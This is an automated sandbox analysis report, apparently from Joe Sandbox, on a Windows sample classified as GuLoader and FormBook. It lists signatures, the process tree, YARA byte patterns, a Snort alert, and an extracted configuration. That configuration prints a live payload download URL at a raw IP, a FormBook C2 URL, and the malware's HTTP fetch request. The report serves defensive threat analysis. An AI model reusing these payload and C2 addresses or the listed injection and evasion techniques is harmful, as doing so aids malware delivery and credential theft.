Play interactive tour

Edit tour

Analysis Report POLITICALLY.exe

Overview

General Information

Sample Name:	POLITICALLY.exe
Analysis ID:	411376
MD5:	80b3365808440838596864bd6d492c02
SHA1:	ea14e621d263a3754234a65bc76cff61bf9eceab
SHA256:	8d6f73da5150cd26789a9a0e0643f69b520306680523d91cb21438ad2e6fa80c
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Potential malicious icon found

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected FormBook

Yara detected Generic Dropper

Yara detected GuLoader

C2 URLs / IPs found in malware configuration

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Hides threads from debuggers

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

PE file contains strange resources

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

POLITICALLY.exe (PID: 7124 cmdline: 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: 80B3365808440838596864BD6D492C02)

POLITICALLY.exe (PID: 6976 cmdline: 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: 80B3365808440838596864BD6D492C02)

explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

control.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)

cmd.exe (PID: 6028 cmdline: /c del 'C:\Users\user\Desktop\POLITICALLY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nortier.cloud/olg8/"], "decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com", "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com", "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com", "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com", "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house", "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com", "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info", "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com", "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company", "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com", "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com", "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com", "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech"]}

Threatname: GuLoader

{"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166b9:$sqlite3step: 68 34 1C 7B E1 0x167cc:$sqlite3step: 68 34 1C 7B E1 0x166e8:$sqlite3text: 68 38 2A 90 C5 0x1680d:$sqlite3text: 68 38 2A 90 C5 0x166fb:$sqlite3blob: 68 53 D8 7F 8C 0x16823:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: POLITICALLY.exe PID: 6976	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Process Memory Space: control.exe PID: 5548	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 10 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "http://111.90.149.46/bin_XNLhDlJvG218.bin"}
Source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.nortier.cloud/olg8/"], "decoy": ["onlinewomensclasses.com", "wiseowldigital.com", "morgolf.com", "bytriciacreations.com", "pamelaron.com", "ratilhabibullah.com", "productstoredt.com", "moopyo.com", "sundrygroup.com", "omenghafoods.online", "rentozo.com", "soakstress.xyz", "cunerier.com", "healthyandfestiveme.com", "paapfly.com", "seawincars.com", "trainsecure.com", "gobabybell.com", "oceanstaruae.com", "hhgrreg.com", "alohaarizonamassage.com", "policomercial.com", "polarishut.com", "takecontrol.house", "diamdima.com", "sullivandecarli.com", "6923599.com", "happinessisselfish.com", "excaliburbooks.com", "shabestantv.com", "mayer.show", "amydawkins.net", "bellymuse.com", "symmetricgym.info", "usatowservice.com", "emergeunbrken.network", "hifipromotion.com", "femboyshooters.com", "kvtlegal.net", "teamforce.pro", "drcconsultancy.com", "blvckgirls.com", "purplebean.company", "donedispute.com", "herbcart.site", "auroraleathers.com", "elefante8.com", "bdsmharness.com", "consulenzaweb.com", "onewtaxfree.com", "go-master.com", "tuancai.net", "importadoralosangeles.com", "mexueer.com", "easiersell.com", "mifeng6.info", "dgjrdk.com", "assroyalty.club", "healyagency.com", "thebridgestreetgallery.com", "artboxxstudio.com", "movingswap.com", "inovus-park.com", "prismatiq.tech"]}

Multi AV Scanner detection for submitted file

Show sources

Source: POLITICALLY.exe	Virustotal: Detection: 17%			Perma Link
Source: POLITICALLY.exe	ReversingLabs: Detection: 17%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

Source: 23.2.control.exe.4fb518.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 23.2.control.exe.4d37960.4.unpack	Avira: Label: TR/Dropper.Gen

Source: POLITICALLY.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: POLITICALLY.exe, 0000000A.00000002.560170779.000000001E32F000.00000040.00000001.sdmp, control.exe, 00000017.00000002.593834522.000000000491F000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: POLITICALLY.exe, control.exe
Source:	Binary string: control.pdbUGP source: POLITICALLY.exe, 0000000A.00000003.543429880.00000000008E3000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000013.00000000.532024048.000000000DC20000.00000002.00000001.sdmp

Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	23_2_030AC3ED
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop ebx	23_2_030A6A95
Source: C:\Windows\SysWOW64\control.exe	Code function: 4x nop then pop edi	23_2_030B565E

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.6:49744 -> 111.90.149.46:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.nortier.cloud/olg8/
Source: Malware configuration extractor	URLs: http://111.90.149.46/bin_XNLhDlJvG218.bin

Source: Joe Sandbox View

ASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY

Source: global traffic

HTTP traffic detected: GET /bin_XNLhDlJvG218.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 111.90.149.46Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46
Source: unknown	TCP traffic detected without corresponding DNS query: 111.90.149.46

Source: global traffic

HTTP traffic detected: GET /bin_XNLhDlJvG218.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 111.90.149.46Cache-Control: no-cache

Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin/
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.bin3
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binb)
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	String found in binary or memory: http://111.90.149.46/bin_XNLhDlJvG218.binw
Source: POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	String found in binary or memory: http://111.90.149.46/in_XNLhDlJvG218.bin
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.6923599.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.6923599.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.6923599.com/olg8/www.wiseowldigital.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.6923599.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.artboxxstudio.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.artboxxstudio.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.artboxxstudio.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.assroyalty.club
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.assroyalty.club/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.assroyalty.club/olg8/www.tuancai.net
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.assroyalty.clubReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.auroraleathers.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.auroraleathers.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.auroraleathers.com/olg8/www.artboxxstudio.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.auroraleathers.comReferer:
Source: explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.cunerier.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.cunerier.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.cunerier.com/olg8/www.purplebean.company
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.cunerier.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.easiersell.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.easiersell.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.easiersell.com/olg8/www.assroyalty.club
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.easiersell.comReferer:
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.moopyo.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.moopyo.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.moopyo.com/olg8/www.morgolf.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.moopyo.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.morgolf.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.morgolf.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.morgolf.com/olg8/www.easiersell.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.morgolf.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.nortier.cloud
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.nortier.cloud/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.nortier.cloudReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinewomensclasses.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinewomensclasses.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinewomensclasses.com/olg8/www.policomercial.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinewomensclasses.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.policomercial.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.policomercial.com/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.policomercial.com/olg8/www.6923599.com
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.policomercial.comReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.prismatiq.tech
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.prismatiq.tech/olg8/
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.prismatiq.tech/olg8/www.soakstress.xyz
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.prismatiq.techReferer:
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.purplebean.company
Source: explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.purplebean.company/olg8/
